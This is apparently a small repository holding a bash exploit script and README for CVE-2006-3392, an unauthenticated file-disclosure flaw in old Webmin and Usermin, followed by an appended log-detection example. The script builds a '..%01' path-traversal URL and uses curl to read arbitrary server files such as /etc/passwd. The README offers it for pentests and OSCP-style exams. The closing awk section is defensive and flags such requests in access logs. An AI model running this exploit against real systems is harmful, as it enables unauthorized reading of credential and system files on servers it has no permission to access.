├── CVE-2006-3392.sh
└── README.md


/CVE-2006-3392.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# Vulnerability: Arbitrary File Disclosure
# Application: Webmin < 1.290 / Usermin < 1.220
# Author: Ivan Glinkin
# Contact: mail@ivanglinkin.com
# Release date: December 04, 2020


# Variables
## General
host="127.0.0.1"; # Web-address - Change according to your needs
port="10000"; # Port, by default 10000
path="/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01";
file=$1; # Payload - File to read
file_example="/etc/passwd"; # Example file to read
grep=$2; # grep string
grep_example="bash"; # Example grep string

# Output

## Header
echo -e "\n\e[00;33m╔═══════════════════════════════════════════════════════════════════════════╗\e[00m"
echo -e "\e[00;33m║\t\t\t\t\t\t\t\t\t ║\e[00m"
echo -e "\e[00;33m║\e[00m\e[01;32m\t Arbitrary File Disclosure - Webmin < 1.290 / Usermin < 1.220 \t \e[00m\e[00;33m║\e[00m"
echo -e "\e[00;33m║\t\t\t\t\t\t\t\t\t ║\e[00m"
echo -e "\e[00;33m╚═══════════════════════════════════════════════════════════════════════════╝\e[00m"
echo -e ""
echo -e "\e[00;33m[ ! ] https://www.linkedin.com/in/IvanGlinkin/ | @IvanGlinkin\e[00m"
echo -e "";

# Print usage when no file argument is given
if [ -z "$file" ]
then
    echo -e "\e[00;33m[ ! ] Usage pattern:\e[00m" "\e[01;31m$0 file_name_to_read \e[00m\e[01;32m[grep string]\e[00m"
    echo -e "\e[00;33m[ ! ] Usage example:\e[00m" "\e[01;31m$0 $file_example\e[00m"
    echo -e "\e[00;33m[ ! ] Usage example:\e[00m" "\e[01;31m$0 $file_example \e[00m\e[01;32m$grep_example\e[00m\n"
    exit
else
    echo -e "\e[00;33m[ ! ] Get information about \e[00m\e[01;31m$file\e[00m\e[00;33m file from \e[01;31m$host\e[00m\e[00;33m host\e[00m\n"
fi

#exploit
# Request the file; filter the response through grep when a grep string is given
if [ -z "$grep" ]
then
    curl -s "$host:$port$path$file"
else
    curl -s "$host:$port$path$file" | grep -i "$grep"
fi
#http://192.168.1.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2006-3392

About the vulnerability
-----------------------
A vulnerability has been reported in Webmin and Usermin that can be exploited to disclose potentially sensitive information. It is caused by an unspecified error in the handling of a URL and allows the contents of any file on the server to be read via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220).

This small script lets you avoid using Metasploit (msfconsole) during enterprise pentests and OSCP-like exams.
The built-in grep option helps you extract only the important information.

Usage example:
--------------
```
nano CVE-2006-3392.sh
# change the IP address in the host variable, then save and exit (ctrl+O, ctrl+X)
chmod +x CVE-2006-3392.sh
./CVE-2006-3392.sh /etc/passwd
```
or
```
./CVE-2006-3392.sh /etc/passwd bash
```


Original article:
-----------------
[https://www.ivanglinkin.com/CVE-2006-3392/](https://www.ivanglinkin.com/CVE-2006-3392/)


Video example:
--------------
![](https://github.com/IvanGlinkin/media_support/blob/main/CVE-2006-3392-Video.gif?raw=true)


Screenshots:
------------
![](https://github.com/IvanGlinkin/media_support/blob/main/CVE-2006-3392-image.gif?raw=true)

--------------------------------------------------------------------------------
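For the detection side, the following added example (not part of the original repository) flags access-log requests that carry the `..%01` traversal segments the script above sends, and broadens the match to `..` followed by any encoded control byte (`%00` to `%1f`). It assumes Common Log Format-style lines; the function names and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: detect "..%01"-style traversal requests in an access log.
# Assumption: Common Log Format lines (request path in field 7, status in field 9).

# Constructed sample log lines (documentation IP ranges, not real traffic).
sample_log() {
cat <<'EOF'
198.51.100.7 - - [04/Dec/2020:10:15:01 +0000] "GET /unauthenticated/..%01/..%01/..%01/etc/passwd HTTP/1.1" 200 1742
192.0.2.10 - admin [04/Dec/2020:10:15:09 +0000] "GET /unauthenticated/style.css HTTP/1.1" 200 5120
198.51.100.7 - - [04/Dec/2020:10:15:12 +0000] "GET /unauthenticated/..%01/..%01/etc/shadow HTTP/1.1" 200 980
203.0.113.44 - - [04/Dec/2020:10:16:30 +0000] "GET /unauthenticated/..%0A/..%0a/etc/hosts HTTP/1.1" 404 0
192.0.2.10 - admin [04/Dec/2020:10:17:02 +0000] "GET /session_login.cgi HTTP/1.1" 200 2210
EOF
}

# detect_traversal: read log lines on stdin and print, for each flagged request,
# "source_ip status traversal_segment_count targeted_path".
detect_traversal() {
  awk '
  {
    path = $7; status = $9
    probe = path
    # Count ".." followed by an encoded control byte (%00-%1f), any hex case.
    n = gsub(/\.\.%[01][0-9A-Fa-f]/, "&", probe)
    if (n > 0) {
      target = path
      # Drop everything up to the last traversal segment to expose the file path.
      sub(/^.*\.\.%[01][0-9A-Fa-f]/, "", target)
      print $1, status, n, target
    }
  }'
}

# summarize_sources: per source IP, print "ip flagged_requests served_with_200".
summarize_sources() {
  detect_traversal | awk '
    { total[$1]++; if ($2 == 200) served[$1]++ }
    END { for (ip in total) print ip, total[ip], served[ip] + 0 }' | sort
}

# Stand-alone run over the constructed sample.
sample_log | detect_traversal
```

A flagged request answered with HTTP 200 means the server returned content for that path, so those sources are the ones to triage first.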